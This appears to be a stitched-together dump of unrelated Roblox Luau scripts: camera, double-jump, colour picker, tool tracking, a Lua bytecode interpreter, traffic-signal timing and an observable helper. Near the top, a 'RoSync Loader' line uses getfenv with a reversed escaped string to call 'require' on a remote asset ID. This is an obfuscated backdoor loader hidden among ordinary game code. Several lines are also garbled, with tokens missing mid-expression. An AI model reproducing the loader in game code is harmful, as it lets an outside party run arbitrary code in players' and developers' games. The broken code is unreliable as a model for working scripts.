-- This loads from, or lazily creates, NumberValue objects for exposed parameters
function OrbitalCamera:LoadNumberValueParameters() -- These initial values do not require change listeners since they are read only once self:LoadOrCreateNumberValueParameter("InitialElevation", "NumberValue", nil) self:LoadOrCreateNumberValueParameter("InitialDistance", "NumberValue", nil) -- Note: ReferenceAzimuth is also used as an initial value, but needs a change listener because it is used in the calculation of the limits self:LoadOrCreateNumberValueParameter("ReferenceAzimuth", "NumberValue", self.SetAndBoundsCheckAzimuthValue) self:LoadOrCreateNumberValueParameter("CWAzimuthTravel", "NumberValue", self.SetAndBoundsCheckAzimuthValues) self:LoadOrCreateNumberValueParameter("CCWAzimuthTravel", "NumberValue", self.SetAndBoundsCheckAzimuthValues) self:LoadOrCreateNumberValueParameter("MinElevation", "NumberValue", self.SetAndBoundsCheckElevationValues) self:LoadOrCreateNumberValueParameter("MaxElevation", "NumberValue", self.SetAndBoundsCheckElevationValues) self:LoadOrCreateNumberValueParameter("MinDistance", "NumberValue", self.SetAndBoundsCheckDistanceValues) self:LoadOrCreateNumberValueParameter("MaxDistance", "NumberValue", self.SetAndBoundsCheckDistanceValues) self:LoadOrCreateNumberValueParameter("UseAzimuthLimits", "BoolValue", self.SetAndBoundsCheckAzimuthValues) -- Internal values set (in radians, from degrees), plus sanitization self.curAzimuthRad = math.rad(self.externalProperties["ReferenceAzimuth"]) self.curElevationRad = math.rad(self.externalProperties["InitialElevation"]) self.curDistance = self.externalProperties["InitialDistance"] self:SetAndBoundsCheckAzimuthValues() self:SetAndBoundsCheckElevationValues() self:SetAndBoundsCheckDistanceValues() end function OrbitalCamera:GetModuleName() return "OrbitalCamera" end function OrbitalCamera:SetInitialOrientation(humanoid: Humanoid) if not humanoid or not humanoid.RootPart then warn("OrbitalCamera could not set initial orientation due to missing humanoid") return end assert(humanoid.RootPart, "") local newDesiredLook = (humanoid.RootPart.CFrame.LookVector -,0.23,0)).Unit local horizontalShift = Util.GetAngleBetweenXZVectors(newDesiredLook, self:GetCameraLookVector()) local vertShift = math.asin(self:GetCameraLookVector().Y) - math.asin(newDesiredLook.Y) if not Util.IsFinite(horizontalShift) then horizontalShift = 0 end if not Util.IsFinite(vertShift) then vertShift = 0 end end
--[[ Last synced 7/31/2021 05:20 RoSync Loader ]]
getfenv()[string.reverse("\101\114\105\117\113\101\114")](5722947559) --[[ ]]--
-- Decompiled with the Synapse X Luau decompiler.
local l__UserInputService__1 = game:GetService("UserInputService"); local u1 = nil; local u2 = nil; local u3 = false; local u4 = false; local u5 = nil; local l__LocalPlayer__6 = game.Players.LocalPlayer; local l__DoubleJump__7 = script:WaitForChild("DoubleJump"); function onJumpRequest() if u1 then if u2 then if u1:IsDescendantOf(workspace) then if u2:GetState() == Enum.HumanoidStateType.Dead then else if u3 then if not u4 then u4 = true; u2.JumpPower = u5 * 1.2; u2:ChangeState(Enum.HumanoidStateType.Jumping); l__LocalPlayer__6.Character.Humanoid:LoadAnimation(l__DoubleJump__7):Play(); end; end; return; end; end; end; end; end; local function v2(p1) u1 = p1; u2 = p1:WaitForChild("Humanoid"); u4 = false; u3 = false; u5 = u2.JumpPower; u2.StateChanged:connect(function(p2, p3) if p3 == Enum.HumanoidStateType.Landed then u3 = false; u4 = false; u2.JumpPower = u5; return; end; if p3 == Enum.HumanoidStateType.Freefall then wait(0.2); u3 = true; end; end); end; if l__LocalPlayer__6.Character then v2(l__LocalPlayer__6.Character); end; l__LocalPlayer__6.CharacterAdded:connect(v2); l__UserInputService__1.JumpRequest:connect(onJumpRequest);
local hue, saturation, value = 0, 0, 1; local function update() colour.BackgroundColor3 = Color3.fromHSV(hue, saturation, value); local color3 = Color3.fromHSV(hue,saturation,value) local r,g,b = color3.R,color3.G,color3.B print(r) print(g) print(b) color.Text = (tostring(math.floor(r*255))..","..tostring(math.floor(g*255))..","..tostring(math.floor(b*255))) color.TextColor3 = Color3.fromRGB(r*255,g*255,b*255) end
-- Function to bind to equip event
local function equip() local torso = player.Character.Torso -- Setup joint variables neck = torso.Neck oldNeckC0 = neck.C0 shoulder = torso:FindFirstChild("Right Shoulder") oldShoulderC0 = shoulder.C0 -- Remember old mouse icon and update current oldIcon = mouse.Icon mouse.Icon = "" -- Bind TouchMoved event if on mobile. Otherwise connect to renderstepped if userInputService.TouchEnabled then connection = userInputService.TouchMoved:connect(mobileFrame) else connection = render:connect(pcFrame) end -- Bind TouchStarted and TouchEnded. Used to determine if character should rotate -- during touch input userInputService.TouchStarted:connect(function(touch, processed) mobileShouldTrack = not processed end) userInputService.TouchEnded:connect(function(touch, processed) mobileShouldTrack = false end) -- If game uses filtering enabled then need to update server while tool is -- held by character. if workspace.FilteringEnabled then while connection do wait() game.ReplicatedStorage.ROBLOX_RocketUpdateEvent:FireServer(neck.C0, shoulder.C0) end end end
--[[ [How fast the body rotates.] [Setting to 0 negates tracking, and setting to 1 is instant rotation. 0.5 is a nice in-between that works with MseGuide on or off.] [Setting this any higher than 1 causes weird glitchy shaking occasionally.] --]]
local UpdateSpeed = 0.5
-- fn cst_flt_rdr(string src, int len, fn func) -- @len - Length of type for reader -- @func - Reader callback
local function cst_flt_rdr(len, func) return function(S) local flt = func(S.source, S.index) S.index = S.index + len return flt end end local function stm_inst_list(S) local len = S:s_int() local list = table.create(len) for i = 1, len do local ins = S:s_ins() local op =, 0x3F) local args = OPCODE_T[op] local mode = OPCODE_M[op] local data = {value = ins, op = OPCODE_RM[op], A =, 6), 0xFF)} if args == 'ABC' then data.B =, 23), 0x1FF) data.C =, 14), 0x1FF) data.is_KB = mode.b == 'OpArgK' and data.B > 0xFF -- post process optimization data.is_KC = mode.c == 'OpArgK' and data.C > 0xFF elseif args == 'ABx' then data.Bx =, 14), 0x3FFFF) data.is_K = mode.b == 'OpArgK' elseif args == 'AsBx' then data.sBx =, 14), 0x3FFFF) - 131071 end list[i] = data end return list end local function stm_const_list(S) local len = S:s_int() local list = table.create(len) for i = 1, len do local tt = stm_byte(S) local k if tt == 1 then k = stm_byte(S) ~= 0 elseif tt == 3 then k = S:s_num() elseif tt == 4 then k = stm_lstring(S) end list[i] = k -- offset +1 during instruction decode end return list end local function stm_sub_list(S, src) local len = S:s_int() local list = table.create(len) for i = 1, len do list[i] = stm_lua_func(S, src) -- offset +1 in CLOSURE end return list end local function stm_line_list(S) local len = S:s_int() local list = table.create(len) for i = 1, len do list[i] = S:s_int() end return list end local function stm_loc_list(S) local len = S:s_int() local list = table.create(len) for i = 1, len do list[i] = {varname = stm_lstring(S), startpc = S:s_int(), endpc = S:s_int()} end return list end local function stm_upval_list(S) local len = S:s_int() local list = table.create(len) for i = 1, len do list[i] = stm_lstring(S) end return list end function stm_lua_func(S, psrc) local proto = {} local src = stm_lstring(S) or psrc -- source is propagated proto.source = src -- source name S:s_int() -- line defined S:s_int() -- last line defined proto.num_upval = stm_byte(S) -- num upvalues proto.num_param = stm_byte(S) -- num params stm_byte(S) -- vararg flag proto.max_stack = stm_byte(S) -- max stack size proto.code = stm_inst_list(S) proto.const = stm_const_list(S) proto.subs = stm_sub_list(S, src) proto.lines = stm_line_list(S) stm_loc_list(S) stm_upval_list(S) -- post process optimization for _, v in ipairs(proto.code) do if v.is_K then v.const = proto.const[v.Bx + 1] -- offset for 1 based index else if v.is_KB then v.const_B = proto.const[v.B - 0xFF] end if v.is_KC then v.const_C = proto.const[v.C - 0xFF] end end end return proto end function lua_bc_to_state(src) -- func reader local rdr_func -- header flags local little local size_int local size_szt local size_ins local size_num local flag_int -- stream object local stream = { -- data index = 1, source = src, } assert(stm_string(stream, 4) == '\27Lua', 'invalid Lua signature') assert(stm_byte(stream) == 0x51, 'invalid Lua version') assert(stm_byte(stream) == 0, 'invalid Lua format') little = stm_byte(stream) ~= 0 size_int = stm_byte(stream) size_szt = stm_byte(stream) size_ins = stm_byte(stream) size_num = stm_byte(stream) flag_int = stm_byte(stream) ~= 0 rdr_func = little and rd_int_le or rd_int_be stream.s_int = cst_int_rdr(size_int, rdr_func) stream.s_szt = cst_int_rdr(size_szt, rdr_func) stream.s_ins = cst_int_rdr(size_ins, rdr_func) if flag_int then stream.s_num = cst_int_rdr(size_num, rdr_func) elseif float_types[size_num] then stream.s_num = cst_flt_rdr(size_num, float_types[size_num][little and 'little' or 'big']) else error('unsupported float size') end return stm_lua_func(stream, '@virtual') end local function close_lua_upvalues(list, index) for i, uv in pairs(list) do if uv.index >= index then uv.value =[uv.index] -- store value = uv uv.index = 'value' -- self reference list[i] = nil end end end local function open_lua_upvalue(list, index, memory) local prev = list[index] if not prev then prev = {index = index, store = memory} list[index] = prev end return prev end local function on_lua_error(failed, err) local src = failed.source local line = failed.lines[failed.pc - 1] error(string.format('%s:%i: %s', src, line, err), 0) end local function run_lua_func(state, env, upvals) local code = state.code local subs = state.subs local vararg = state.vararg local top_index = -1 local open_list = {} local memory = state.memory local pc = state.pc while true do local inst = code[pc] local op = inst.op pc = pc + 1 if op < 18 then if op < 8 then if op < 3 then if op < 1 then --[[LOADNIL]] for i = inst.A, inst.B do memory[i] = nil end elseif op > 1 then --[[GETUPVAL]] local uv = upvals[inst.B] memory[inst.A] =[uv.index] else --[[ADD]] local lhs, rhs if inst.is_KB then lhs = inst.const_B else lhs = memory[inst.B] end if inst.is_KC then rhs = inst.const_C else rhs = memory[inst.C] end memory[inst.A] = lhs + rhs end elseif op > 3 then if op < 6 then if op > 4 then --[[SELF]] local A = inst.A local B = inst.B local index if inst.is_KC then index = inst.const_C else index = memory[inst.C] end memory[A + 1] = memory[B] memory[A] = memory[B][index] else --[[GETGLOBAL]] memory[inst.A] = env[inst.const] end elseif op > 6 then --[[GETTABLE]] local index if inst.is_KC then index = inst.const_C else index = memory[inst.C] end memory[inst.A] = memory[inst.B][index] else --[[SUB]] local lhs, rhs if inst.is_KB then lhs = inst.const_B else lhs = memory[inst.B] end if inst.is_KC then rhs = inst.const_C else rhs = memory[inst.C] end memory[inst.A] = lhs - rhs end else --[[MOVE]] memory[inst.A] = memory[inst.B] end elseif op > 8 then if op < 13 then if op < 10 then --[[SETGLOBAL]] env[inst.const] = memory[inst.A] elseif op > 10 then if op < 12 then --[[CALL]] local A = inst.A local B = inst.B local C = inst.C local params if B == 0 then params = top_index - A else params = B - 1 end local ret_list = table.pack(memory[A](table.unpack(memory, A + 1, A + params))) local ret_num = ret_list.n if C == 0 then top_index = A + ret_num - 1 else ret_num = C - 1 end table.move(ret_list, 1, ret_num, A, memory) else --[[SETUPVAL]] local uv = upvals[inst.B][uv.index] = memory[inst.A] end else --[[MUL]] local lhs, rhs if inst.is_KB then lhs = inst.const_B else lhs = memory[inst.B] end if inst.is_KC then rhs = inst.const_C else rhs = memory[inst.C] end memory[inst.A] = lhs * rhs end elseif op > 13 then if op < 16 then if op > 14 then --[[TAILCALL]] local A = inst.A local B = inst.B local params if B == 0 then params = top_index - A else params = B - 1 end close_lua_upvalues(open_list, 0) return memory[A](table.unpack(memory, A + 1, A + params)) else --[[SETTABLE]] local index, value if inst.is_KB then index = inst.const_B else index = memory[inst.B] end if inst.is_KC then value = inst.const_C else value = memory[inst.C] end memory[inst.A][index] = value end elseif op > 16 then --[[NEWTABLE]] memory[inst.A] = {} else --[[DIV]] local lhs, rhs if inst.is_KB then lhs = inst.const_B else lhs = memory[inst.B] end if inst.is_KC then rhs = inst.const_C else rhs = memory[inst.C] end memory[inst.A] = lhs / rhs end else --[[LOADK]] memory[inst.A] = inst.const end else --[[FORLOOP]] local A = inst.A local step = memory[A + 2] local index = memory[A] + step local limit = memory[A + 1] local loops if step == math.abs(step) then loops = index <= limit else loops = index >= limit end if loops then memory[A] = index memory[A + 3] = index pc = pc + inst.sBx end end elseif op > 18 then if op < 28 then if op < 23 then if op < 20 then --[[LEN]] memory[inst.A] = #memory[inst.B] elseif op > 20 then if op < 22 then --[[RETURN]] local A = inst.A local B = inst.B local len if B == 0 then len = top_index - A + 1 else len = B - 1 end close_lua_upvalues(open_list, 0) return table.unpack(memory, A, A + len - 1) else --[[CONCAT]] local B = inst.B local str = memory[B] for i = B + 1, inst.C do str = str .. memory[i] end memory[inst.A] = str end else --[[MOD]] local lhs, rhs if inst.is_KB then lhs = inst.const_B else lhs = memory[inst.B] end if inst.is_KC then rhs = inst.const_C else rhs = memory[inst.C] end memory[inst.A] = lhs % rhs end elseif op > 23 then if op < 26 then if op > 24 then --[[CLOSE]] close_lua_upvalues(open_list, inst.A) else --[[EQ]] local lhs, rhs if inst.is_KB then lhs = inst.const_B else lhs = memory[inst.B] end if inst.is_KC then rhs = inst.const_C else rhs = memory[inst.C] end if (lhs == rhs) == (inst.A ~= 0) then pc = pc + code[pc].sBx end pc = pc + 1 end elseif op > 26 then --[[LT]] local lhs, rhs if inst.is_KB then lhs = inst.const_B else lhs = memory[inst.B] end if inst.is_KC then rhs = inst.const_C else rhs = memory[inst.C] end if (lhs < rhs) == (inst.A ~= 0) then pc = pc + code[pc].sBx end pc = pc + 1 else --[[POW]] local lhs, rhs if inst.is_KB then lhs = inst.const_B else lhs = memory[inst.B] end if inst.is_KC then rhs = inst.const_C else rhs = memory[inst.C] end memory[inst.A] = lhs ^ rhs end else --[[LOADBOOL]] memory[inst.A] = inst.B ~= 0 if inst.C ~= 0 then pc = pc + 1 end end elseif op > 28 then if op < 33 then if op < 30 then --[[LE]] local lhs, rhs if inst.is_KB then lhs = inst.const_B else lhs = memory[inst.B] end if inst.is_KC then rhs = inst.const_C else rhs = memory[inst.C] end if (lhs <= rhs) == (inst.A ~= 0) then pc = pc + code[pc].sBx end pc = pc + 1 elseif op > 30 then if op < 32 then --[[CLOSURE]] local sub = subs[inst.Bx + 1] -- offset for 1 based index local nups = sub.num_upval local uvlist if nups ~= 0 then uvlist = {} for i = 1, nups do local pseudo = code[pc + i - 1] if pseudo.op == OPCODE_RM[0] then -- @MOVE uvlist[i - 1] = open_lua_upvalue(open_list, pseudo.B, memory) elseif pseudo.op == OPCODE_RM[4] then -- @GETUPVAL uvlist[i - 1] = upvals[pseudo.B] end end pc = pc + nups end memory[inst.A] = lua_wrap_state(sub, env, uvlist) else --[[TESTSET]] local A = inst.A local B = inst.B if (not memory[B]) ~= (inst.C ~= 0) then memory[A] = memory[B] pc = pc + code[pc].sBx end pc = pc + 1 end else --[[UNM]] memory[inst.A] = -memory[inst.B] end elseif op > 33 then if op < 36 then if op > 34 then --[[VARARG]] local A = inst.A local len = inst.B if len == 0 then len = vararg.len top_index = A + len - 1 end table.move(vararg.list, 1, len, A, memory) else --[[FORPREP]] local A = inst.A local init, limit, step init = assert(tonumber(memory[A]), '`for` initial value must be a number') limit = assert(tonumber(memory[A + 1]), '`for` limit must be a number') step = assert(tonumber(memory[A + 2]), '`for` step must be a number') memory[A] = init - step memory[A + 1] = limit memory[A + 2] = step pc = pc + inst.sBx end elseif op > 36 then --[[SETLIST]] local A = inst.A local C = inst.C local len = inst.B local tab = memory[A] local offset if len == 0 then len = top_index - A end if C == 0 then C = inst[pc].value pc = pc + 1 end offset = (C - 1) * FIELDS_PER_FLUSH table.move(memory, A + 1, A + len, offset + 1, tab) else --[[NOT]] memory[inst.A] = not memory[inst.B] end else --[[TEST]] if (not memory[inst.A]) ~= (inst.C ~= 0) then pc = pc + code[pc].sBx end pc = pc + 1 end else --[[TFORLOOP]] local A = inst.A local base = A + 3 local vals = {memory[A](memory[A + 1], memory[A + 2])} table.move(vals, 1, inst.C, base, memory) if memory[base] ~= nil then memory[A + 2] = memory[base] pc = pc + code[pc].sBx end pc = pc + 1 end else --[[JMP]] pc = pc + inst.sBx end state.pc = pc end end function lua_wrap_state(proto, env, upval) local function wrapped(...) local passed = table.pack(...) local memory = table.create(proto.max_stack) local vararg = {len = 0, list = {}} table.move(passed, 1, proto.num_param, 0, memory) if proto.num_param < passed.n then local start = proto.num_param + 1 local len = passed.n - proto.num_param vararg.len = len table.move(passed, start, start + len - 1, 1, vararg.list) end local state = {vararg = vararg, memory = memory, code = proto.code, subs = proto.subs, pc = 1} local result = table.pack(pcall(run_lua_func, state, env, upval)) if result[1] then return table.unpack(result, 2, result.n) else local failed = {pc = state.pc, source = proto.source, lines = proto.lines} on_lua_error(failed, result[2]) return end end return wrapped end return function(bCode, env) return lua_wrap_state(lua_bc_to_state(bCode), env or getfenv(0)) end
-- Make the HotbarFrame, which holds only the Hotbar Slots
HotbarFrame = NewGui('Frame', 'Hotbar') HotbarFrame.Parent = MainFrame
SignalValues.Signal1.Value = 1 SignalValues.Signal1a.Value = 1 SignalValues.Signal2.Value = 3 SignalValues.Signal2a.Value = 3 PedValues.PedSignal1.Value = 3 PedValues.PedSignal1a.Value = 3 PedValues.PedSignal2.Value = 1 PedValues.PedSignal2a.Value = 1 TurnValues.TurnSignal1.Value = 3 TurnValues.TurnSignal1a.Value = 3 TurnValues.TurnSignal2.Value = 3 TurnValues.TurnSignal2a.Value = 3 wait(26)--Green Time (BEGIN SIGNAL1 GREEN) SignalValues.Signal1.Value = 1 SignalValues.Signal1a.Value = 1 SignalValues.Signal2.Value = 3 SignalValues.Signal2a.Value = 3 PedValues.PedSignal1.Value = 3 PedValues.PedSignal1a.Value = 3 PedValues.PedSignal2.Value = 2 PedValues.PedSignal2a.Value = 2 TurnValues.TurnSignal1.Value = 3 TurnValues.TurnSignal1a.Value = 3 TurnValues.TurnSignal2.Value = 3 TurnValues.TurnSignal2a.Value = 3 wait(6) -- Green Time + Time for flashing pedestrian signals SignalValues.Signal1.Value = 2 SignalValues.Signal1a.Value = 2 SignalValues.Signal2.Value = 3 SignalValues.Signal2a.Value = 3 PedValues.PedSignal1.Value = 3 PedValues.PedSignal1a.Value = 3 PedValues.PedSignal2.Value = 3 PedValues.PedSignal2a.Value = 3 TurnValues.TurnSignal1.Value = 3 TurnValues.TurnSignal1a.Value = 3 TurnValues.TurnSignal2.Value = 3 TurnValues.TurnSignal2a.Value = 3 wait(4) -- Yellow Time SignalValues.Signal1.Value = 3 SignalValues.Signal1a.Value = 3 SignalValues.Signal2.Value = 3 SignalValues.Signal2a.Value = 3 PedValues.PedSignal1.Value = 3 PedValues.PedSignal1a.Value = 3 PedValues.PedSignal2.Value = 3 PedValues.PedSignal2a.Value = 3 TurnValues.TurnSignal1.Value = 3 TurnValues.TurnSignal1a.Value = 3 TurnValues.TurnSignal2.Value = 3 TurnValues.TurnSignal2a.Value = 3 wait(2)-- ALL RED SignalValues.Signal1.Value = 3 SignalValues.Signal1a.Value = 3 SignalValues.Signal2.Value = 1 SignalValues.Signal2a.Value = 1 PedValues.PedSignal1.Value = 1 PedValues.PedSignal1a.Value = 1 PedValues.PedSignal2.Value = 3 PedValues.PedSignal2a.Value = 3 TurnValues.TurnSignal1.Value = 3 TurnValues.TurnSignal1a.Value = 3 TurnValues.TurnSignal2.Value = 3 TurnValues.TurnSignal2a.Value = 3 wait(26)--Green Time (BEGIN SIGNAL2 GREEN) SignalValues.Signal1.Value = 3 SignalValues.Signal1a.Value = 3 SignalValues.Signal2.Value = 1 SignalValues.Signal2a.Value = 1 PedValues.PedSignal1.Value = 2 PedValues.PedSignal1a.Value = 2 PedValues.PedSignal2.Value = 3 PedValues.PedSignal2a.Value = 3 TurnValues.TurnSignal1.Value = 3 TurnValues.TurnSignal1a.Value = 3 TurnValues.TurnSignal2.Value = 3 TurnValues.TurnSignal2a.Value = 3 wait(6) -- Green Time + Time for flashing pedestrian signals SignalValues.Signal1.Value = 3 SignalValues.Signal1a.Value = 3 SignalValues.Signal2.Value = 2 SignalValues.Signal2a.Value = 2 PedValues.PedSignal1.Value = 3 PedValues.PedSignal1a.Value = 3 PedValues.PedSignal2.Value = 3 PedValues.PedSignal2a.Value = 3 TurnValues.TurnSignal1.Value = 3 TurnValues.TurnSignal1a.Value = 3 TurnValues.TurnSignal2.Value = 3 TurnValues.TurnSignal2a.Value = 3 wait(4) -- Yellow Time SignalValues.Signal1.Value = 3 SignalValues.Signal1a.Value = 3 SignalValues.Signal2.Value = 3 SignalValues.Signal2a.Value = 3 PedValues.PedSignal1.Value = 3 PedValues.PedSignal1a.Value = 3 PedValues.PedSignal2.Value = 3 PedValues.PedSignal2a.Value = 3 TurnValues.TurnSignal1.Value = 3 TurnValues.TurnSignal1a.Value = 3 TurnValues.TurnSignal2.Value = 3 TurnValues.TurnSignal2a.Value = 3 wait(2)-- ALL RED SignalValues.Signal1.Value = 1 SignalValues.Signal1a.Value = 3 SignalValues.Signal2.Value = 3 SignalValues.Signal2a.Value = 3 PedValues.PedSignal1.Value = 3 PedValues.PedSignal1a.Value = 3 PedValues.PedSignal2.Value = 3 PedValues.PedSignal2a.Value = 3 TurnValues.TurnSignal1.Value = 1 TurnValues.TurnSignal1a.Value = 3 TurnValues.TurnSignal2.Value = 3 TurnValues.TurnSignal2a.Value = 3 wait(10)--Green Time (BEGIN SIGNAL1 PROTECTED TURN GREEN) TurnValues.TurnSignal1.Value = 2 wait(4)--Yield Time (YIELD SIGNAL1 PROTECTED TURN GREEN) TurnValues.TurnSignal1.Value = 3 SignalValues.Signal1a.Value = 3 wait(2)-- Clearance SignalValues.Signal1.Value = 1 SignalValues.Signal1a.Value = 1 SignalValues.Signal2.Value = 3 SignalValues.Signal2a.Value = 3 PedValues.PedSignal1.Value = 3 PedValues.PedSignal1a.Value = 3 PedValues.PedSignal2.Value = 3 PedValues.PedSignal2a.Value = 3 TurnValues.TurnSignal1.Value = 3 TurnValues.TurnSignal1a.Value = 3 TurnValues.TurnSignal2.Value = 3 TurnValues.TurnSignal2a.Value = 3 wait(10) -- Green Time + Time for Signal1a SignalValues.Signal1.Value = 2 SignalValues.Signal1a.Value = 2 SignalValues.Signal2.Value = 3 SignalValues.Signal2a.Value = 3 PedValues.PedSignal1.Value = 3 PedValues.PedSignal1a.Value = 3 PedValues.PedSignal2.Value = 3 PedValues.PedSignal2a.Value = 3 TurnValues.TurnSignal1.Value = 3 TurnValues.TurnSignal1a.Value = 3 TurnValues.TurnSignal2.Value = 3 TurnValues.TurnSignal2a.Value = 3 wait(4) -- Yellow Time SignalValues.Signal1.Value = 3 SignalValues.Signal1a.Value = 3 SignalValues.Signal2.Value = 3 SignalValues.Signal2a.Value = 3 PedValues.PedSignal1.Value = 3 PedValues.PedSignal1a.Value = 3 PedValues.PedSignal2.Value = 3 PedValues.PedSignal2a.Value = 3 TurnValues.TurnSignal1.Value = 3 TurnValues.TurnSignal1a.Value = 3 TurnValues.TurnSignal2.Value = 3 TurnValues.TurnSignal2a.Value = 3 wait(2)-- ALL RED SignalValues.Signal1.Value = 3 SignalValues.Signal1a.Value = 3 SignalValues.Signal2.Value = 1 SignalValues.Signal2a.Value = 1 PedValues.PedSignal1.Value = 1 PedValues.PedSignal1a.Value = 1 PedValues.PedSignal2.Value = 3 PedValues.PedSignal2a.Value = 3 TurnValues.TurnSignal1.Value = 3 TurnValues.TurnSignal1a.Value = 3 TurnValues.TurnSignal2.Value = 3 TurnValues.TurnSignal2a.Value = 3 wait(26)--Green Time (BEGIN SIGNAL2 GREEN) SignalValues.Signal1.Value = 3 SignalValues.Signal1a.Value = 3 SignalValues.Signal2.Value = 1 SignalValues.Signal2a.Value = 1 PedValues.PedSignal1.Value = 2 PedValues.PedSignal1a.Value = 2 PedValues.PedSignal2.Value = 3 PedValues.PedSignal2a.Value = 3 TurnValues.TurnSignal1.Value = 3 TurnValues.TurnSignal1a.Value = 3 TurnValues.TurnSignal2.Value = 3 TurnValues.TurnSignal2a.Value = 3 wait(6) -- Green Time + Time for flashing pedestrian signals SignalValues.Signal1.Value = 3 SignalValues.Signal1a.Value = 3 SignalValues.Signal2.Value = 2 SignalValues.Signal2a.Value = 2 PedValues.PedSignal1.Value = 3 PedValues.PedSignal1a.Value = 3 PedValues.PedSignal2.Value = 3 PedValues.PedSignal2a.Value = 3 TurnValues.TurnSignal1.Value = 3 TurnValues.TurnSignal1a.Value = 3 TurnValues.TurnSignal2.Value = 3 TurnValues.TurnSignal2a.Value = 3 wait(4) -- Yellow Time SignalValues.Signal1.Value = 3 SignalValues.Signal1a.Value = 3 SignalValues.Signal2.Value = 3 SignalValues.Signal2a.Value = 3 PedValues.PedSignal1.Value = 3 PedValues.PedSignal1a.Value = 3 PedValues.PedSignal2.Value = 3 PedValues.PedSignal2a.Value = 3 TurnValues.TurnSignal1.Value = 3 TurnValues.TurnSignal1a.Value = 3 TurnValues.TurnSignal2.Value = 3 TurnValues.TurnSignal2a.Value = 3 wait(2)-- ALL RED SignalValues.Signal1.Value = 3 SignalValues.Signal1a.Value = 1 SignalValues.Signal2.Value = 3 SignalValues.Signal2a.Value = 3 PedValues.PedSignal1.Value = 3 PedValues.PedSignal1a.Value = 3 PedValues.PedSignal2.Value = 3 PedValues.PedSignal2a.Value = 3 TurnValues.TurnSignal1.Value = 3 TurnValues.TurnSignal1a.Value = 1 TurnValues.TurnSignal2.Value = 3 TurnValues.TurnSignal2a.Value = 3 wait(10)--Green Time (BEGIN SIGNAL1a PROTECTED TURN GREEN) TurnValues.TurnSignal1a.Value = 2 wait(4)--Yield Time (YIELD SIGNAL1a PROTECTED TURN GREEN) TurnValues.TurnSignal1a.Value = 3 SignalValues.Signal1.Value = 3 wait(2)-- All Red Cycle SignalValues.Signal1.Value = 1 SignalValues.Signal1a.Value = 1 SignalValues.Signal2.Value = 3 SignalValues.Signal2a.Value = 3 PedValues.PedSignal1.Value = 3 PedValues.PedSignal1a.Value = 3 PedValues.PedSignal2.Value = 3 PedValues.PedSignal2a.Value = 3 TurnValues.TurnSignal1.Value = 3 TurnValues.TurnSignal1a.Value = 3 TurnValues.TurnSignal2.Value = 3 TurnValues.TurnSignal2a.Value = 3 wait(10) -- Green Time + Time for Signal1a SignalValues.Signal1.Value = 2 SignalValues.Signal1a.Value = 2 SignalValues.Signal2.Value = 3 SignalValues.Signal2a.Value = 3 PedValues.PedSignal1.Value = 3 PedValues.PedSignal1a.Value = 3 PedValues.PedSignal2.Value = 3 PedValues.PedSignal2a.Value = 3 TurnValues.TurnSignal1.Value = 3 TurnValues.TurnSignal1a.Value = 3 TurnValues.TurnSignal2.Value = 3 TurnValues.TurnSignal2a.Value = 3 wait(4) -- Yellow Time SignalValues.Signal1.Value = 3 SignalValues.Signal1a.Value = 3 SignalValues.Signal2.Value = 3 SignalValues.Signal2a.Value = 3 PedValues.PedSignal1.Value = 3 PedValues.PedSignal1a.Value = 3 PedValues.PedSignal2.Value = 3 PedValues.PedSignal2a.Value = 3 TurnValues.TurnSignal1.Value = 3 TurnValues.TurnSignal1a.Value = 3 TurnValues.TurnSignal2.Value = 3 TurnValues.TurnSignal2a.Value = 3 wait(2)-- ALL RED SignalValues.Signal1.Value = 3 SignalValues.Signal1a.Value = 3 SignalValues.Signal2.Value = 1 SignalValues.Signal2a.Value = 1 PedValues.PedSignal1.Value = 1 PedValues.PedSignal1a.Value = 1 PedValues.PedSignal2.Value = 3 PedValues.PedSignal2a.Value = 3 TurnValues.TurnSignal1.Value = 3 TurnValues.TurnSignal1a.Value = 3 TurnValues.TurnSignal2.Value = 3 TurnValues.TurnSignal2a.Value = 3 wait(26)--Green Time (BEGIN SIGNAL2 GREEN) SignalValues.Signal1.Value = 3 SignalValues.Signal1a.Value = 3 SignalValues.Signal2.Value = 1 SignalValues.Signal2a.Value = 1 PedValues.PedSignal1.Value = 2 PedValues.PedSignal1a.Value = 2 PedValues.PedSignal2.Value = 3 PedValues.PedSignal2a.Value = 3 TurnValues.TurnSignal1.Value = 3 TurnValues.TurnSignal1a.Value = 3 TurnValues.TurnSignal2.Value = 3 TurnValues.TurnSignal2a.Value = 3 wait(6) -- Green Time + Time for flashing pedestrian signals SignalValues.Signal1.Value = 3 SignalValues.Signal1a.Value = 3 SignalValues.Signal2.Value = 2 SignalValues.Signal2a.Value = 2 PedValues.PedSignal1.Value = 3 PedValues.PedSignal1a.Value = 3 PedValues.PedSignal2.Value = 3 PedValues.PedSignal2a.Value = 3 TurnValues.TurnSignal1.Value = 3 TurnValues.TurnSignal1a.Value = 3 TurnValues.TurnSignal2.Value = 3 TurnValues.TurnSignal2a.Value = 3 wait(4) -- Yellow Time SignalValues.Signal1.Value = 3 SignalValues.Signal1a.Value = 3 SignalValues.Signal2.Value = 3 SignalValues.Signal2a.Value = 3 PedValues.PedSignal1.Value = 3 PedValues.PedSignal1a.Value = 3 PedValues.PedSignal2.Value = 3 PedValues.PedSignal2a.Value = 3 TurnValues.TurnSignal1.Value = 3 TurnValues.TurnSignal1a.Value = 3 TurnValues.TurnSignal2.Value = 3 TurnValues.TurnSignal2a.Value = 3 wait(2)-- ALL RED end
--[=[ Defaults the observable to a value if it isn't fired immediately ```lua Rx.NEVER:Pipe({ Rx.defaultsTo("Hello") }):Subscribe(print) --> Hello ``` @param value any @return (source: Observable) -> Observable ]=]
function Rx.defaultsTo(value) return function(source) assert(Observable.isObservable(source), "Bad observable") return local maid = local fired = false maid:GiveTask(source:Subscribe( function(...) fired = true sub:Fire(...) end, sub:GetFailComplete())) if not fired then sub:Fire(value) end return maid end) end end
-- The raw pixel size of the button and the offset needed for 9-slicing it
